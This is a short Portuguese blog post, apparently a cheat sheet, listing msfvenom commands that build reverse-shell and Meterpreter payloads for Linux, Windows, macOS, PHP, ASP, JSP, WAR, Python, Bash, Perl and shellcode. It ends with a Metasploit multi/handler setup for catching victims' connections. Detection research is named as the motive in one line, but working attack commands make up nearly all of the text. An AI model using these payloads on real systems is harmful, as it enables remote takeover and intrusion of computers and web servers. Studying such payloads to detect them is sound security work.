Home Hacking Criando Payloads de Shell Reverso com MSFVenom

Criando Payloads de Shell Reverso com MSFVenom

por - TI Forense

Estou fazendo um artigo científico de detecção de shell reverso sobre os payload’s criados pelo KALI / Metasploit. Para tanto preciso primeiro criar estes malware’s. Este artigo visa apenas registrar o processo de criação de payload’s do MSFVenom para diversos sistemas como Windows, Linux, Mac e outros.

Os comandos são bem simples, LPORT e LHOST são a porta e IP do atacante que receberão o shell reverso. Por exemplo se for numa rede local você usará por exemplo 192.168.1.40 se for numa máquina de cara para internet você deverá usar seu IP público. É possível receber um shell reverso numa rede NATeada mas é necessário fazer o redirecionamento do IP público para o IP de intranet.

Listar os Payload’s

msfvenom -l

Tipos de Binários

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<SEU IP> LPORT=<SUA PORTA> -f elf > shell.elf

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<SEU IP> LPORT=<Sua Porta> -f exe > shell.exe

Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Seu IP> LPORT=<Sua Porta> -f macho > shell.macho

Payload’s para servidores WEB

PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Seu IP> LPORT=<Sua Porta> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Seu IP> LPORT=<Sua Porta> -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Seu IP> LPORT=<Sua Porta> -f raw > shell.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Seu IP> LPORT=<Sua Porta> -f war > shell.war

Payload’s Adicionais

Python

msfvenom -p cmd/unix/reverse_python LHOST=<Seu IP> LPORT=<Sua Porta> -f raw > shell.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST=<Seu IP> LPORT=<Sua Porta> -f raw > shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=<Seu IP> LPORT=<Sua Porta> -f raw > shell.pl

Shellcode

For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.

Linux Based Shellcode

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Windows Based Shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Mac Based Shellcode

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Handlers

Os Handlers colocam o metasploit na posição de receber as conexões reversas, ou seja, escutar o chamados das vítimas.

use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST>
set LPORT <LPORT>
set ExitOnSession false
exploit -j -z

Agradeço a todos pela atenção e leitura.

Fonte: https://netsec.ws/?p=331

Artigos Similares

Deixe seu comentário